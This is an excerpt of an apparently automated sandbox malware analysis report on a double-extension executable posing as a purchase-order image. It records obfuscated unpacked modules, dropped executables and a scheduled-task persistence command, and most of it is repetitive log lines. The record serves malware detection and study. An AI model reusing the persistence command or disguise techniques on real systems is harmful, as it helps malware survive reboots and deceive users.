                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_067FA760 push eax; ret 12_2_067FA761
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_067F71F3 push es; ret 12_2_067F71F4
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_06945720 push es; ret 12_2_06945740
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_0694D011 push es; retn 0004h 12_2_0694D020
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_0694DCA0 push es; ret 12_2_0694DCB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_08362ABF push es; ret 12_2_08362AD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_0849C051 push es; ret 12_2_0849C070
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_0849AEF8 push eax; iretd 12_2_0849AEF9
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_09527A01 push es; retn 000Ch 12_2_09527A10
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_09526AD0 push es; ret 12_2_09526AE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_095254EF push es; ret 12_2_095254F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_09521FB1 push es; ret 12_2_09521FC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 18_2_05DF9B00 push esp; retf 05DDh 18_2_05DF9CB1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 18_2_06186E4B push es; retf 18_2_06186E4C
                      Source: RFQ_PO_98473009.png.exe Static PE information: section name: .text entropy: 7.914079956714794
                      Source: lVbhkOPdhyxT.exe.0.dr Static PE information: section name: .text entropy: 7.914079956714794
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, LwPThgfLaOemDNfGyZ.cs High entropy of concatenated method names: 'FIc7wXDiV1', 'Bhf7WoSDsr', 'wgH7Xl5fJT', 'HS07gEnuCS', 'cEL7cRC52X', 'tMVXo1nav8', 'X2tXyP26vX', 'zk0XeWaru5', 'rRWXPMe7mV', 'nm4X5fkgu7'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, rGDpxZKaqlGF0mXsfS.cs High entropy of concatenated method names: 'nIAWqdkdmp', 'eqnWI99HAT', 'x1LWsvNpDc', 'R7qWkRZXsP', 'judWo2pK62', 'zK1WykhDh7', 'YjmWeN2yfY', 'IngWPAH0SZ', 'JVDW5EM8qu', 'WuWWiFM1KM'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs High entropy of concatenated method names: 'AFnbwIAtSG', 'sUlb97SXYK', 'mhxbWRBR8s', 'GvpbOIJg3F', 'JfJbXlq5Pp', 'f63b7ktXqi', 'NjFbgcgTLd', 'my5bcUQDqf', 'X0abBFYGta', 'JaRbZ4ICWy'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, BNNes6zuWgY54P8mFR.cs High entropy of concatenated method names: 'fOOvEX5C2g', 'cKjvKYpwQV', 'zx4v31ji4T', 'rtpvfYctKY', 'k3kvVrV8ih', 'vElvRlr2uX', 'kJ8vCItYOA', 'vysvnPueEb', 'ujMvdAFnU6', 'YgpvMsI7LC'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, yTPxsWGuuavb9FyWob.cs High entropy of concatenated method names: 'hfY8ZuP7W', 'EC1mRQaP4', 'k9kEL0Uaq', 'MQVLF9Ihl', 'ghG3nPQ89', 'OLmDVomMc', 'pZhistvKwgDQ5aa3wn', 'mQ31oFUQf0TciQ8utC', 'nGmr2ogR4', 'zTYvCU9gS'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, TxCZi3DW0nYPtZIDxj.cs High entropy of concatenated method names: 'eqwXplOEYN', 'JcDXLn0aCH', 'BQFOhQq1C1', 'FK0ORbd1hv', 'OlJOCR65mc', 'n5EOlcCoKU', 'tZ7O68QhC7', 'woFO19TxVI', 'TYaOJQO4r6', 'EAvOF7Zb7W'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tm4DAMWXqKqTsgwPCZ.cs High entropy of concatenated method names: 'Dispose', 'fKQS5RFKHU', 'v1KGVl8SNY', 'r9roBs9Xqq', 'mIHSipTd5K', 'UAlSzDTYTF', 'ProcessDialogKey', 'x0vGTLhFCj', 'NScGSH9ZYO', 'xn9GGgiUAa'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, mLLEqSHr5ZfiDPsPVl.cs High entropy of concatenated method names: 'k2rSgGDpxZ', 'oqlScGF0mX', 'EVaSZ9E5fd', 'Q8RSYnkxCZ', 'mIDSaxj6wP', 'ahgStLaOem', 'nL9XisovJvrmYiYpPA', 'cRW87U3Z2Dw7rB1RaG', 'Dx4SSI15Rn', 'ChWSbc1x4I'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, JiQAtZJeHv6ht9nhcm.cs High entropy of concatenated method names: 'QaUgdNOACY', 'JuLgMWGp5H', 'tN5g8CCd8c', 'TExgmtrZOo', 'k0IgpRrCrP', 'qsvgEdgf7u', 'T6tgLRRgjR', 'dfjgKiI6KR', 'W86g3k0rFV', 'AQwgDT7dZV'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, sglvJneE79KQRFKHUY.cs High entropy of concatenated method names: 'Jf9UavP0YS', 'F2DUQ18CjW', 'a25UUPTL2J', 'xrBU0M9XVd', 'ci2U4TYZpT', 'MAEUn3l2su', 'Dispose', 'gabr9K5Rna', 'kX8rWa9AJd', 'cXwrOfsksD'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, jiUAanil8GLiFftG8w.cs High entropy of concatenated method names: 'D5avOvI48j', 'iAFvXJ3JF3', 'TSsv7ielA1', 'nsavg2MVVG', 'hSfvUU9RHx', 'u9LvcxLQCC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, MuQlawSSIiUgI8GXsvp.cs High entropy of concatenated method names: 'SYPviJoOWi', 'cdlvzAC1jH', 'iQS0Ty4GXw', 'KXW0So7S1L', 'lbO0GB90NT', 'T410bhWyDh', 'o9Y0Hj6jF8', 'e1C0wcVhxE', 'EjX094bBys', 'hk20WZJJYQ'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, UncyDDyN5AkyBus0ar.cs High entropy of concatenated method names: 'YNbQPvGNma', 'NFiQiFuvvV', 'p0jrTXlVKf', 'mDMrStBPNI', 'HMWQNf6eZH', 'jQPQuBKlub', 'oSkQA9jdFI', 'WV6Qq4xkMR', 'YPNQI6nGn9', 'PFPQs49Ewq'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, MZ3WuBkShW330iZ6K8.cs High entropy of concatenated method names: 'XdBQZO4pyx', 'TC1QYYt8ks', 'ToString', 'gymQ9FrUIB', 'ADWQWT0W2a', 'p9AQOIeLlr', 'jaPQXVUMNr', 'R3VQ7AjOCE', 'S7iQgNFrGP', 'OaGQcE0q6f'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, TgQj8ESHW7pT44l2VNw.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvHjUv4Wbw', 'EUBjvYRrYL', 'vrVj0LtC6I', 'E3BjjHHv1d', 'tQVj49qF5O', 'tkgjxa8SqX', 'ujNjnE5vbg'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, CFcyJAAWEa6gGKySEJ.cs High entropy of concatenated method names: 'aHM2KIaAR6', 'EVB233evhY', 'lcP2fh3qtR', 'YCq2Vo5iOT', 'ygn2RfItyC', 'w9F2CVO1u4', 'mLL26tPA5d', 'kCw215QOpY', 'oRw2FOCmY7', 'P5i2NL8Gco'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, RBrBs2OuBrXGxBZrkB.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'txNG5ajIbk', 'SdxGi6DCGh', 'O7MGz00Zgf', 'IjtbTInUgl', 'T7AbSFj6su', 'fkYbGO2nVK', 'uKEbbopNPB', 'h13Hd5dcApynUoC9RaS'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, Cw01JFRk1BEe55xg7e.cs High entropy of concatenated method names: 'HYJ7n3a2d6', 'P0w7dNMmB6', 'MQa78SRtBc', 'qVe7mwocLH', 'Awu7EDNIy4', 'GWB7LrtwKP', 'm7273fDVkM', 'zAr7D9sQB2', 'hXRRF0xB14P4VCJbthQ', 'IotAECxLFTx6IGWklKu'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, sLhFCj5FScH9ZYOdn9.cs High entropy of concatenated method names: 'sL2UfL50yY', 'NewUV45fTX', 'klkUh8ZGWL', 'EtoUR9gpLB', 'HmmUCbQj65', 'DpwUljK7kl', 'JS8U6JH68f', 'JYSU15MM64', 'AlcUJuRhXn', 'RDjUFNC5lH'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, AemJkj6RCt3DUbxNFE.cs High entropy of concatenated method names: 'AUwg9HobC2', 'GDCgO1NijE', 'F0mg7iU9tS', 'G8l7ih1PWZ', 'TUH7zExsCt', 'WoWgT8OeQm', 'wZSgSIqaoF', 'P1SgGwT7b1', 'y7EgbwKNbv', 'E36gHPJZ4y'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, LBBOL33Va9E5fdq8Rn.cs High entropy of concatenated method names: 'xPBOmLyOcW', 'z3xOEjJTsJ', 'EQcOKjPyW7', 'oLOO3m3V8Z', 'y3rOafSmG0', 'XW6Ottaqlf', 'dHSOQyVMhy', 'nYxOrFAnSI', 'nEKOUubww3', 'DGpOvW5G2F'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, LwPThgfLaOemDNfGyZ.cs High entropy of concatenated method names: 'FIc7wXDiV1', 'Bhf7WoSDsr', 'wgH7Xl5fJT', 'HS07gEnuCS', 'cEL7cRC52X', 'tMVXo1nav8', 'X2tXyP26vX', 'zk0XeWaru5', 'rRWXPMe7mV', 'nm4X5fkgu7'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, rGDpxZKaqlGF0mXsfS.cs High entropy of concatenated method names: 'nIAWqdkdmp', 'eqnWI99HAT', 'x1LWsvNpDc', 'R7qWkRZXsP', 'judWo2pK62', 'zK1WykhDh7', 'YjmWeN2yfY', 'IngWPAH0SZ', 'JVDW5EM8qu', 'WuWWiFM1KM'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs High entropy of concatenated method names: 'AFnbwIAtSG', 'sUlb97SXYK', 'mhxbWRBR8s', 'GvpbOIJg3F', 'JfJbXlq5Pp', 'f63b7ktXqi', 'NjFbgcgTLd', 'my5bcUQDqf', 'X0abBFYGta', 'JaRbZ4ICWy'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, BNNes6zuWgY54P8mFR.cs High entropy of concatenated method names: 'fOOvEX5C2g', 'cKjvKYpwQV', 'zx4v31ji4T', 'rtpvfYctKY', 'k3kvVrV8ih', 'vElvRlr2uX', 'kJ8vCItYOA', 'vysvnPueEb', 'ujMvdAFnU6', 'YgpvMsI7LC'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, yTPxsWGuuavb9FyWob.cs High entropy of concatenated method names: 'hfY8ZuP7W', 'EC1mRQaP4', 'k9kEL0Uaq', 'MQVLF9Ihl', 'ghG3nPQ89', 'OLmDVomMc', 'pZhistvKwgDQ5aa3wn', 'mQ31oFUQf0TciQ8utC', 'nGmr2ogR4', 'zTYvCU9gS'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, TxCZi3DW0nYPtZIDxj.cs High entropy of concatenated method names: 'eqwXplOEYN', 'JcDXLn0aCH', 'BQFOhQq1C1', 'FK0ORbd1hv', 'OlJOCR65mc', 'n5EOlcCoKU', 'tZ7O68QhC7', 'woFO19TxVI', 'TYaOJQO4r6', 'EAvOF7Zb7W'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tm4DAMWXqKqTsgwPCZ.cs High entropy of concatenated method names: 'Dispose', 'fKQS5RFKHU', 'v1KGVl8SNY', 'r9roBs9Xqq', 'mIHSipTd5K', 'UAlSzDTYTF', 'ProcessDialogKey', 'x0vGTLhFCj', 'NScGSH9ZYO', 'xn9GGgiUAa'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, mLLEqSHr5ZfiDPsPVl.cs High entropy of concatenated method names: 'k2rSgGDpxZ', 'oqlScGF0mX', 'EVaSZ9E5fd', 'Q8RSYnkxCZ', 'mIDSaxj6wP', 'ahgStLaOem', 'nL9XisovJvrmYiYpPA', 'cRW87U3Z2Dw7rB1RaG', 'Dx4SSI15Rn', 'ChWSbc1x4I'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, JiQAtZJeHv6ht9nhcm.cs High entropy of concatenated method names: 'QaUgdNOACY', 'JuLgMWGp5H', 'tN5g8CCd8c', 'TExgmtrZOo', 'k0IgpRrCrP', 'qsvgEdgf7u', 'T6tgLRRgjR', 'dfjgKiI6KR', 'W86g3k0rFV', 'AQwgDT7dZV'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, sglvJneE79KQRFKHUY.cs High entropy of concatenated method names: 'Jf9UavP0YS', 'F2DUQ18CjW', 'a25UUPTL2J', 'xrBU0M9XVd', 'ci2U4TYZpT', 'MAEUn3l2su', 'Dispose', 'gabr9K5Rna', 'kX8rWa9AJd', 'cXwrOfsksD'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, jiUAanil8GLiFftG8w.cs High entropy of concatenated method names: 'D5avOvI48j', 'iAFvXJ3JF3', 'TSsv7ielA1', 'nsavg2MVVG', 'hSfvUU9RHx', 'u9LvcxLQCC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, MuQlawSSIiUgI8GXsvp.cs High entropy of concatenated method names: 'SYPviJoOWi', 'cdlvzAC1jH', 'iQS0Ty4GXw', 'KXW0So7S1L', 'lbO0GB90NT', 'T410bhWyDh', 'o9Y0Hj6jF8', 'e1C0wcVhxE', 'EjX094bBys', 'hk20WZJJYQ'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, UncyDDyN5AkyBus0ar.cs High entropy of concatenated method names: 'YNbQPvGNma', 'NFiQiFuvvV', 'p0jrTXlVKf', 'mDMrStBPNI', 'HMWQNf6eZH', 'jQPQuBKlub', 'oSkQA9jdFI', 'WV6Qq4xkMR', 'YPNQI6nGn9', 'PFPQs49Ewq'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, MZ3WuBkShW330iZ6K8.cs High entropy of concatenated method names: 'XdBQZO4pyx', 'TC1QYYt8ks', 'ToString', 'gymQ9FrUIB', 'ADWQWT0W2a', 'p9AQOIeLlr', 'jaPQXVUMNr', 'R3VQ7AjOCE', 'S7iQgNFrGP', 'OaGQcE0q6f'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, TgQj8ESHW7pT44l2VNw.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvHjUv4Wbw', 'EUBjvYRrYL', 'vrVj0LtC6I', 'E3BjjHHv1d', 'tQVj49qF5O', 'tkgjxa8SqX', 'ujNjnE5vbg'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, CFcyJAAWEa6gGKySEJ.cs High entropy of concatenated method names: 'aHM2KIaAR6', 'EVB233evhY', 'lcP2fh3qtR', 'YCq2Vo5iOT', 'ygn2RfItyC', 'w9F2CVO1u4', 'mLL26tPA5d', 'kCw215QOpY', 'oRw2FOCmY7', 'P5i2NL8Gco'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, RBrBs2OuBrXGxBZrkB.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'txNG5ajIbk', 'SdxGi6DCGh', 'O7MGz00Zgf', 'IjtbTInUgl', 'T7AbSFj6su', 'fkYbGO2nVK', 'uKEbbopNPB', 'h13Hd5dcApynUoC9RaS'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, Cw01JFRk1BEe55xg7e.cs High entropy of concatenated method names: 'HYJ7n3a2d6', 'P0w7dNMmB6', 'MQa78SRtBc', 'qVe7mwocLH', 'Awu7EDNIy4', 'GWB7LrtwKP', 'm7273fDVkM', 'zAr7D9sQB2', 'hXRRF0xB14P4VCJbthQ', 'IotAECxLFTx6IGWklKu'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, sLhFCj5FScH9ZYOdn9.cs High entropy of concatenated method names: 'sL2UfL50yY', 'NewUV45fTX', 'klkUh8ZGWL', 'EtoUR9gpLB', 'HmmUCbQj65', 'DpwUljK7kl', 'JS8U6JH68f', 'JYSU15MM64', 'AlcUJuRhXn', 'RDjUFNC5lH'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, AemJkj6RCt3DUbxNFE.cs High entropy of concatenated method names: 'AUwg9HobC2', 'GDCgO1NijE', 'F0mg7iU9tS', 'G8l7ih1PWZ', 'TUH7zExsCt', 'WoWgT8OeQm', 'wZSgSIqaoF', 'P1SgGwT7b1', 'y7EgbwKNbv', 'E36gHPJZ4y'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, LBBOL33Va9E5fdq8Rn.cs High entropy of concatenated method names: 'xPBOmLyOcW', 'z3xOEjJTsJ', 'EQcOKjPyW7', 'oLOO3m3V8Z', 'y3rOafSmG0', 'XW6Ottaqlf', 'dHSOQyVMhy', 'nYxOrFAnSI', 'nEKOUubww3', 'DGpOvW5G2F'
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe File created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe File created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe File created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: Possible double extension: png.exe; Static PE information: RFQ_PO_98473009.png.exe
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
